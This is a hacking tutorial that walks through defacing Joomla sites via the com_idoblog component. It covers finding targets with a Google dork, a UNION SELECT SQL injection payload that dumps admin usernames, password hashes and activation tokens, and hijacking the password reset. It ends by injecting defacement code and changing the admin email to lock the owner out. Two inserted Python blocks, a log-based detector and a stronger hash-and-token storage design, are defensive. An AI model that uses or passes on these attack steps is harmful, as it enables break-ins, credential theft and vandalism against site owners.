Tools required:
SQL-i Knowledge
reiluke SQLiHelper 2.7
Joomla! Query Knowledge
Finding Exploit And Target
These two steps can be done in either order, depending on what you find first: the target or the exploit…
Google dork:
inurl:"option=com_idoblog"
This comes up with results for about 140,000 pages.
At inj3ct0r.com search for: com_idoblog
This gives us back:
== Joomla Component idoblog 1.1b30 (com_idoblog) SQL Injection Vuln ==
index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62+union+select+1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+jos_users--
The exploit can be separated into two parts:
Part I
index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62
This part opens the blog admin profile page; if the admin page does not exist, the exploit will not work (not completely confirmed).
Part II
+union+select+1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+jos_users--
This part reads the username and password from the jos_users table.
Testing Vulnerability
Disable images for faster page loading:
[Firefox] Tools >> Options >> Content (tab menu) >> untick 'Load images automatically'
Go to:
Code:
http://www.site.com/index.php?option=com_idoblog&view=idoblog&Itemid=22
The site loads normally…
Go to:
Code:
http://www.site.com/index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62
Site content: blog Profile Admin
Go to:
Code:
http://www.site.com/index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62+union+select+1--
The site is vulnerable.
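Seen from the web server, the three test requests above leave a recognisable trace in the access log: an integer parameter (userid) that suddenly carries SQL keywords, a UNION SELECT, a concat function, a reference to a *_users table and a trailing comment terminator. The following Python example is added here for the defender's side and is not part of the original tutorial; it scans Apache combined-format log lines for exactly those markers. The log lines, client addresses and timestamps are constructed for the example, and the parameter list treated as numeric is my assumption about what the component expects.

```python
"""Spot UNION-based SQL injection attempts against a Joomla front end in access logs."""
import re
from collections import Counter
from urllib.parse import parse_qsl, urlsplit

# Constructed Apache combined-format log lines (hosts, times and sizes are made up).
# The request targets mirror the three test requests from the tutorial above.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2010:13:55:36 +0000] "GET /index.php?option=com_idoblog&view=idoblog&Itemid=22 HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Oct/2010:13:55:40 +0000] "GET /index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62 HTTP/1.1" 200 4811 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Oct/2010:13:55:44 +0000] "GET /index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62+union+select+1-- HTTP/1.1" 200 4790 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Oct/2010:13:56:02 +0000] "GET /index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62+union+select+1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+jos_users-- HTTP/1.1" 200 4900 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Oct/2010:14:01:10 +0000] "GET /index.php?option=com_user&view=reset HTTP/1.1" 200 3300 "-" "Mozilla/5.0"
"""

# Apache combined format: client ident user [timestamp] "METHOD target HTTP/x.y" ...
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"'
)

# Query parameters the component is assumed to treat as integer ids (assumption for this example).
NUMERIC_PARAMS = {"id", "userid", "itemid", "catid"}

# Markers of a UNION-based extraction attempt, checked against each decoded parameter value.
SUSPECT_PATTERNS = {
    "union_select": re.compile(r"\bunion\b\s+(?:all\s+)?select\b", re.I),
    "concat_function": re.compile(r"\bconcat(?:_ws)?\s*\(", re.I),
    "users_table": re.compile(r"\bfrom\s+\w*users\b", re.I),
    "comment_terminator": re.compile(r"(?:--|#|/\*)\s*$"),
}


def analyse_request(ip, ts, target):
    """Return one finding per suspicious query parameter in a single request."""
    findings = []
    # parse_qsl decodes %xx escapes and turns '+' back into spaces, so the
    # SQL keywords are matched on what the database driver would have seen.
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        reasons = []
        if name.lower() in NUMERIC_PARAMS and not value.isdigit():
            reasons.append("non_numeric_id")
        for label, pattern in SUSPECT_PATTERNS.items():
            if pattern.search(value):
                reasons.append(label)
        if reasons:
            findings.append({"ip": ip, "time": ts, "param": name, "value": value, "reasons": reasons})
    return findings


def scan_log(text):
    """Scan whole log text and return all findings in log order."""
    hits = []
    for line in text.splitlines():
        match = REQUEST_RE.match(line)
        if not match:
            continue  # not a request line we understand; skip rather than guess
        hits.extend(analyse_request(match["ip"], match["ts"], match["target"]))
    return hits


def offending_ips(hits):
    """Count findings per client address, the natural key for an alert threshold."""
    return Counter(hit["ip"] for hit in hits)


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f'{hit["time"]} {hit["ip"]} {hit["param"]}={hit["value"]!r} -> {", ".join(hit["reasons"])}')
    print(dict(offending_ips(scan_log(SAMPLE_LOG))))
```

Only the two injected requests are flagged; the normal profile request and the password-reset page are not, because the check keys on the shape of the parameter value rather than on the component name. Matching on the decoded value matters: URL-encoded variants of the same payload decode to the same string before the regular expressions run.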
Inject Target
Open reiluke SQLiHelper 2.7.
In Target paste:
Code:
http://www.site.com/index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62
and click on Inject.
Follow the standard steps until you find Column Name.
Notice that the exploit from inj3ct0r would not work here because it looks for the jos_users table, while, as you can see, our target uses the jos153_users table for storing data.
Let's dump username, email and password from Column Name jos153_users. Click on Dump Now:
username:
admin
email:
info@site.com
password:
169fad83bb2ac775bbaef4938d504f4e:mlqMfY0Vc9KLxPk056eewFWM13vEThJI
Joomla! 1.5.x uses MD5 to hash passwords. When a password is created, it is hashed together with a 32-character salt appended to the end of the password string, and the result is stored as {TOTAL HASH}:{ORIGINAL SALT}. So cracking that password takes time and time…
The easiest way in is to reset the admin password!
Admin Password Reset
Go to:
Code:
http://www.site.com/index.php?option=com_user&view=reset
This is the standard Joomla! query for a password reset request.
The "Forgot your Password?" page will load.
In E-mail Address enter the admin email (in our case it is info@site.com) and press Submit.
If you found the right admin email, the "Confirm your account." page will load, asking for a Token:
Finding Token
To find the token, go back to reiluke SQLiHelper 2.7 and dump username and activation from Column Name jos153_users:
username:
admin
activation:
5482dd177624761a290224270fa55f1d
5482dd177624761a290224270fa55f1d is the 32-character verification token; enter it and press Submit.
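Both weaknesses this walkthrough leans on come down to what the users table stores: Joomla! 1.5 kept md5(password + salt):salt, a fast hash that makes offline guessing cheap, and it kept the account activation/reset token in clear in the same table, so a read-only SQL injection is all that is needed to complete the reset. The Python example below is added here and is not code from the tutorial or from the Joomla project. It reproduces the 1.5 storage format so a legacy value can be recognised and verified, shows a PBKDF2-HMAC-SHA256 replacement with an upgrade-on-login path, and shows how storing only a hash of a reset token keeps a database read from being enough to use it. The iteration count, storage string layout and token length are my choices.

```python
"""Joomla! 1.5 password and token storage, and a stronger design for both."""
import hashlib
import hmac
import re
import secrets

SALT_LENGTH = 32            # Joomla 1.5 used a 32-character random salt
DEFAULT_ITERATIONS = 600_000  # chosen for this example; tune to your hardware
LEGACY_RE = re.compile(r"^[0-9a-f]{32}:[A-Za-z0-9]{32}$")


def joomla15_hash(password, salt):
    """Reproduce the Joomla 1.5 storage format: md5(password + salt) ':' salt."""
    digest = hashlib.md5((password + salt).encode("utf-8")).hexdigest()
    return f"{digest}:{salt}"


def is_legacy_hash(stored):
    """True when a stored value still has the 1.5 layout and should be migrated."""
    return bool(LEGACY_RE.match(stored))


def verify_joomla15(password, stored):
    """Check a password against a 1.5-style value without leaking timing on the compare."""
    _digest, sep, salt = stored.partition(":")
    if not sep:
        return False
    return hmac.compare_digest(joomla15_hash(password, salt), stored)


def pbkdf2_hash(password, iterations=DEFAULT_ITERATIONS):
    """Store 'pbkdf2_sha256$iterations$salthex$digesthex' (layout chosen for this example)."""
    salt = secrets.token_bytes(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${digest.hex()}"


def verify_pbkdf2(password, stored):
    """Recompute with the stored salt and iteration count, then compare in constant time."""
    try:
        scheme, iterations, salt_hex, digest_hex = stored.split("$")
    except ValueError:
        return False
    if scheme != "pbkdf2_sha256":
        return False
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"),
                                    bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(candidate.hex(), digest_hex)


def upgrade_on_login(password, stored, iterations=DEFAULT_ITERATIONS):
    """Migration path: if a legacy value verifies, return its PBKDF2 replacement, else None.

    The plaintext is only available at login, so that is the moment to re-hash.
    """
    if is_legacy_hash(stored) and verify_joomla15(password, stored):
        return pbkdf2_hash(password, iterations)
    return None


def issue_reset_token():
    """Return (raw_token, stored_value): the raw token goes to the user only, the hash to the DB."""
    raw = secrets.token_urlsafe(32)
    stored = hashlib.sha256(raw.encode("ascii")).hexdigest()
    return raw, stored


def token_matches(presented, stored):
    """Hash what the user presents and compare to the stored hash in constant time."""
    return hmac.compare_digest(hashlib.sha256(presented.encode("ascii")).hexdigest(), stored)


if __name__ == "__main__":
    legacy = joomla15_hash("correct horse", "A" * SALT_LENGTH)  # constructed salt
    print("legacy layout recognised:", is_legacy_hash(legacy))
    print("legacy verifies:", verify_joomla15("correct horse", legacy))
    upgraded = upgrade_on_login("correct horse", legacy, iterations=50_000)
    print("upgraded verifies:", verify_pbkdf2("correct horse", upgraded))
    raw, stored = issue_reset_token()
    print("DB copy differs from e-mailed token:", raw != stored, "| matches:", token_matches(raw, stored))
```

With the token stored hashed, the activation column dumped in the step above would hold a value that the reset page does not accept; the usable token exists only in the e-mail sent to the account owner. A production design would also give reset tokens a short expiry and invalidate them after one use.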
If you did everything right, the "Reset your Password" page will load. Enter your new password…
After that go to:
Code:
http://www.site.com/administrator/
This is the standard Joomla portal content management system login.
Enter username admin and your password, then click on Login.
Go to Extensions >> Template Manager >> Default Template Name >> Edit HTML.
In the Template HTML Editor insert your defaced code, click Apply, Save and you are done!!!
To make the admin's life more miserable, click on admin in the main Joomla window and in the User Details page change the admin E-mail.
Credit:
MindFreak [HckGuide]